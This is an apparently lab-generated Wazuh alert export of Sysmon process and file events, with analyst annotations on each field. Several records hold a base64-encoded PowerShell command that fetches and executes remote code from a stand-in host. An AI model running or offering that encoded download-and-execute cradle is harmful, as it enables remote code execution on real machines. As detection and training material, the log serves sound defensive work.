data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:39:13.251 ProcessGuid: {94294ddc-bd91-680a-9c0b-000000000e00} ProcessId: 11356 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd8d-680a-990b-000000000e00} ParentProcessId: 12064 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:13.251
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd91-680a-9c0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11356
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd8d-680a-990b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  12064
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:17.573+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:17.573+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  89
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy, but it can warn you of high‑value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534357.1809814
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:14.8850196Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285208
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:39:14.876 ProcessGuid: {94294ddc-bd91-680a-9c0b-000000000e00} ProcessId: 11356 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_npkr0h0g.e4e.ps1 CreationUtcTime: 2025-04-24 22:39:14.876 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:14.876
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd91-680a-9c0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11356
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_npkr0h0g.e4e.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:39:14.876
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:20.198+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:20.198+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  86
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy, but it can warn you of high‑value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534360.1812583
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:18.2193741Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285229
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:39:16.709 ProcessGuid: {94294ddc-bd94-680a-9f0b-000000000e00} ProcessId: 9520 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd91-680a-9c0b-000000000e00} ParentProcessId: 11356 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:16.709
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd94-680a-9f0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9520
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd91-680a-9c0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  11356
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:21.028+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:21.028+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  90
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534361.1820650
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:18.4176699Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285234
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:39:18.402 ProcessGuid: {94294ddc-bd94-680a-9f0b-000000000e00} ProcessId: 9520 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_2q2rgyzm.xew.ps1 CreationUtcTime: 2025-04-24 22:39:18.402 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:18.402
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd94-680a-9f0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9520
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_2q2rgyzm.xew.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:39:18.402
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:25.573+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:25.573+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  87
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534365.1823415
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:22.8896094Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285277
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

